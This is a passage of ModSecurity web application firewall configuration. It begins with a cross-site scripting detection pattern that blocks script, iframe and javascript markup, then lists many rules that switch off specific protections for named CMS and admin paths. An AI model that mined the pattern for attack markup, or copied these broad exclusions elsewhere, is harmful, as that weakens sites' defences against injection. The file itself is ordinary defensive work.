:/referrer/|!ARGS:/template/|!ARGS:/ajax/  "(?:< ?script|< ?(?:i?frame ?src|a ?href) ?= ?(?:ogg|tls|ssl|gopher|zlib|(ht|f)tps?)\:/|document\.write ?\(|(?:<|< ?/) ?(?:(?:java|vb)script|applet|activex|chrome)|< ?/?i?frame|\% ?env)"          "phase:2,deny,log,auditlog,status:403,capture,t:none,t:removeNulls,t:utf8tounicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsdecode,t:cssdecode,t:removeComments,t:compressWhiteSpace,t:lowercase,multiMatch,id:391148,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Potential Cross Site Scripting Attack',logdata:'%{TX.0}'"

SecMarker END_RULES_92565

SecRule REQUEST_FILENAME "/storefiles" "phase:2,id:92566,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340029"

SecRule REQUEST_FILENAME "/amember/default/admin-payments/p/invoices" "phase:2,id:92567,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/v1a/json/obmstore\.image\.delete" "phase:2,id:92568,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/modules/gateways/callback/paypalpaymentsproref\.php" "phase:2,id:92569,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340029"

SecRule REQUEST_FILENAME "/eafservice/jsp/v1/term" "phase:2,id:92570,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340029"

SecRule REQUEST_FILENAME "/s/ajax\.php" "phase:2,id:92571,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/ladm" "phase:2,id:92572,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/cgi-bin/jrental/scripts/command\.cgi" "phase:2,id:92573,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/v1b/json/obmstore\.template\.save/" "phase:2,id:92574,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=390614"

SecRule REQUEST_FILENAME "/admin/lang_edit\.php" "phase:2,id:92575,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/amember/admin-setup" "phase:2,id:92576,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/1823/natives" "phase:2,id:92577,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340029"

SecRule REQUEST_FILENAME "/lists/admin" "phase:2,id:92578,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/memberadmin/prefs_email\.php" "phase:2,id:92579,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/wp-admin/edit\.php" "phase:2,id:92580,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147"

SecRule REQUEST_FILENAME "/services/bmcontent\.json" "phase:2,id:92581,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340148"

SecRule REQUEST_FILENAME "/remote\.php/dav/" "phase:2,id:92582,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340029,ctl:ruleRemovebyID=392301"

SecRule REQUEST_FILENAME "/s/projects/save" "phase:2,id:92583,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/admin/entries/about/98-about" "phase:2,id:92584,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/s/projects/save/2" "phase:2,id:92585,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/admin/static_text/6" "phase:2,id:92586,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/admin/entries/studies" "phase:2,id:92587,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350147"

SecRule REQUEST_FILENAME "/wp-json/baa/v2/register-broken-link" "phase:2,id:92588,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/cms/wp-admin/admin-ajax\.php" "phase:2,id:92589,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340748"

SecRule REQUEST_FILENAME "/cms/wp-admin/post\.php" "phase:2,id:92590,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340007"

SecRule REQUEST_FILENAME "/wp-json/op3" "phase:2,id:92591,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/admin/pages/edit/editform" "phase:2,id:92592,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350147"

SecRule REQUEST_FILENAME "/amember/admin-users" "phase:2,id:92593,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/amember/admin-trans-global" "phase:2,id:92594,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/v1b/json/fr\.image\.delete/" "phase:2,id:92595,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/wp-admin/edit-tags\.php" "phase:2,id:92596,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340029,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/json/fr\.device\.preview/" "phase:2,id:92597,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350147"

SecRule REQUEST_FILENAME "/lms/test/addquestion" "phase:2,id:92598,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350147"

SecRule REQUEST_FILENAME "/lms/test/editquestion" "phase:2,id:92599,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350147"

SecRule REQUEST_FILENAME "/lms/test/edittest" "phase:2,id:92600,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350147"

SecRule REQUEST_FILENAME "/lms/test/create" "phase:2,id:92601,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350147"

SecRule REQUEST_FILENAME "/lms/test/addtest" "phase:2,id:92602,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350147"

SecRule REQUEST_FILENAME "/s/news/save" "phase:2,id:92603,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=341256"

SecRule REQUEST_FILENAME "/en/employer_signup\.php" "phase:2,id:92604,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340029"

SecRule REQUEST_FILENAME "/entity_reference_autocomplete/node/" "phase:2,id:92605,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/autobrite-magifoam" "phase:2,id:92606,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/wp-json/redirection/v1/redirect/post" "phase:2,id:92607,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/autodiscover/autodiscover\.xml" "phase:2,id:92608,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=390616"

SecRule REQUEST_FILENAME "/admin/index\.php" "phase:2,id:92609,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147"

SecRule REQUEST_FILENAME "/admin/food-menus/" "phase:2,id:92610,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/admin/entries/events/" "phase:2,id:92611,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/_fragment" "phase:2,id:92612,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340029"

SecRule REQUEST_FILENAME "/secutran" "phase:2,id:92613,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340095"

SecRule REQUEST_FILENAME "/quickbooks/mirror\.php" "phase:2,id:92614,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380022,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=380023,ctl:ruleRemovebyID=380024,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=390711"

SecRule REQUEST_FILENAME "/v1c/json/" "phase:2,id:92615,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340029"

SecRule REQUEST_FILENAME "/json/fr\.template\.save" "phase:2,id:92616,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/json/en\.template\.save" "phase:2,id:92617,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/json/fr\.template\.convert" "phase:2,id:92618,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/json/en\.template\.convert" "phase:2,id:92619,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/json/fr\.image\.delete/" "phase:2,id:92620,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/json/fr\.image\.save/" "phase:2,id:92621,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/json/en\.image\.delete/" "phase:2,id:92622,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/json/en\.image\.save/" "phase:2,id:92623,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/vip/bonus\.php" "phase:2,id:92624,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/cvs3/" "phase:2,id:92625,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390616"

SecRule REQUEST_FILENAME "/php/upd\.php" "phase:2,id:92626,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/core/admin/auth\.php" "phase:2,id:92627,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/backoffice/index\.php" "phase:2,id:92628,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/vd/async/detailpost\.php" "phase:2,id:92629,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/processing_contact_fr\.php" "phase:2,id:92630,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/processing_contact_en\.php" "phase:2,id:92631,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/cbc_portal_api_dev/services/" "phase:2,id:92632,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/computer\.form\.php" "phase:2,id:92633,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/admin_cf/modif_news\.php" "phase:2,id:92634,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/ecrire/" "phase:2,id:92635,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/dolibarr/compta/" "phase:2,id:92636,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/admin/admin_lecon_eds\.php" "phase:2,id:92637,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/cshop/add_cart_confirm" "phase:2,id:92638,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/maintenance/modules-site/menus-pages/mod-content-page\.php" "phase:2,id:92639,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/project\.form\.php" "phase:2,id:92640,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/api/statiqueweb/" "phase:2,id:92641,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/news/admin/modifier-actualite\.html" "phase:2,id:92642,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/admin/contenu/modif_contenu3\.asp" "phase:2,id:92643,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/fr/admin/contenu/modif_contenu3\.asp" "phase:2,id:92644,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/en/admin/contenu/modif_contenu3\.asp" "phase:2,id:92645,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/data/docdata\.php" "phase:2,id:92646,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340029"

SecRule REQUEST_FILENAME "/compta/facture/card\.php" "phase:2,id:92647,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340029"

SecRule REQUEST_FILENAME "/admin/contenu/modif_contenu3\.asp" "phase:2,id:92648,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340029"

SecRule REQUEST_FILENAME "/promotion/actualites/actualites-ajouter/" "phase:2,id:92649,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/utils/operations\.php" "phase:2,id:92650,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340029"

SecRule REQUEST_FILENAME "/rest/merchant/storefront/" "phase:2,id:92651,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390616"

SecRule REQUEST_FILENAME "/cbc_portal_api_dev/services/returnmanagement/datafile/" "phase:2,id:92652,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/goggle-ads-auth/auth\.php" "phase:2,id:92653,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/front/softwarelicense\.form\.php" "phase:2,id:92654,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/front/user\.form\.php" "phase:2,id:92655,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/front/monitor\.form\.php" "phase:2,id:92656,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/ecrire/" "phase:2,id:92657,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

